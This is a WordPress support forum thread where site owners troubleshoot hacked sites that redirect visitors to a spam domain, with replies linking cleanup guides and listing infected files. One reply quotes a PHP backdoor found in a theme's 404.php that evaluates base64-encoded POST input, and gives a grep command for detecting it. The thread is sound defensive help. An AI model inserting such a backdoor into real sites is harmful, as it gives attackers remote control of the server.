WordPress.org

Ready to get started?Download WordPress

Forums

Site linking to http://notfound.iownyour.org/ (7 posts)

  1. dmcrae17
    Member
    Posted 1 year ago #

    I am having issues with my site redirecting to http://notfound.iownyour.org/ which looks like a fake search engine, advertising online blackjack. I am experiencing the following specific issues:

    1) When clicking one of my site's links from Facebook on Firefox and Safari: redirects to the above spam website

    2) When clicking one of my site's links from Facebook on Google Chrome: redirects to my website with no issue

    3) When searching and clicking the link of my site "Craving Cognition" on Google using any browser, it redirects to above spam website.

    My site is: http://cravingcognition.com

    Help would be appreciated!

  2. esmi
    Forum Moderator
    Posted 1 year ago #

    A scan of your site is clean but this does sound like a hack. :-(

    I think you really need to start working your way through these resources:
    http://codex.wordpress.org/FAQ_My_site_was_hacked
    http://wordpress.org/support/topic/268083#post-1065779
    http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/
    http://ottopress.com/2009/hacked-wordpress-backdoors/

    Anything less will probably result in the hacker walking straight back into your site again.

  3. manugallack
    Member
    Posted 1 year ago #

    Hi,
    I've got the same problem with my site :
    http://montblanc34.com

    When searching and clicking the link of my site "montblanc34.com" on Google, the under-categories redirect to this website :

    http://notfound.iownyour.org

    If someone can help me.... (in french would be better !!)

  4. bcworkz
    Member
    Posted 1 year ago #

    @manugallack, I am not observing the behavior you describe. You must confirm if it is your site that is redirecting or your browser that is redirecting. These selective redirects can be difficult to isolate.

    Or perhaps you fixed the problem? If not, and if it is indeed your site that is redirecting, follow the suggestions posted by esmi above. I am sorry, I am unaware of such resources in French.

  5. juanmatias
    Member
    Posted 1 year ago #

    SOLVED

    Hi all.

    I had the same issue in my server (http://www.jackyiddo.com), when I accessed directly from address bar there is no problem. But if I found my site on Goole and then clicked on muy address then I was redirected to other site. This is what I found.

    This pice of code was inserted in a few files into the WordPress directory tree:

    [ Moderator note: Please do not post that malware code here. ]

    Now, if you decode this base64 encoded text you will have this:

    [ Redacted ]

    As you can see depending on a few parameters the site is redirected.

    You need to find the modified files and delete this command (this command could be multiple times in a single file). I found this piece of code in these files:

    • wp-config.php
    • wp-settings.php
    • wp-content/plugins/contact-form-7/modules/acceptance.php
    • wp-content/plugins/contact-form-7/modules/quiz.php
    • wp-content/plugins/contact-form-7/modules/select.php
    • wp-content/plugins/contact-form-7/modules/special-mail-tags.php
    • wp-content/plugins/contact-form-7/modules/jetpack.php
    • wp-content/plugins/contact-form-7/modules/akismet.php
    • wp-content/plugins/contact-form-7/modules/captcha.php
    • wp-content/plugins/contact-form-7/modules/text.php
    • wp-content/plugins/contact-form-7/modules/textarea.php
    • wp-content/plugins/contact-form-7/modules/checkbox.php
    • wp-content/plugins/contact-form-7/modules/file.php
    • wp-content/plugins/contact-form-7/modules/submit.php
    • wp-content/plugins/contact-form-7/modules/response.php
    • wp-content/plugins/contact-form-7/modules/flamingo.php

    Plus in file wp-content/themes/picturethis/404.php I found this code:

    <?php if ($_POST["php"]){eval(base64_decode($_POST["php"]));exit;} ?>

    I don't know if it is malicious, but I deleted it just in case and my site is working ok.

    How to find this code through your dir tree?

    If you have access to server's command line you can run this command:

    find ./ -name \*php -type f -exec grep -l 'eval.base64_decode' {} +

    (It will find the code into PHP files)

    From here on you must delete the code as you prefer.

    I hope this is useful for you.

  6. methos10
    Member
    Posted 1 year ago #

    Hi dmcrae17!

    This is a js based malware. If you will disable the javascript in your browser it will work. You can test it.
    But is not a solution!! The solution is if you will download the latest version of the WordPress and owerride all of your files. Change your ftp and mysql password.
    After the uprade your site should work.

    I hope it was helpful!

  7. Andrew
    Forum Moderator
    Posted 1 year ago #

    The solution isn't removing the malicious code. That will only resolve the symptom of the hack. The website will still remain hacked.

    Follow the links provided by Esmi to resolve a hack.

Topic Closed

This topic has been closed to new replies.

About this Topic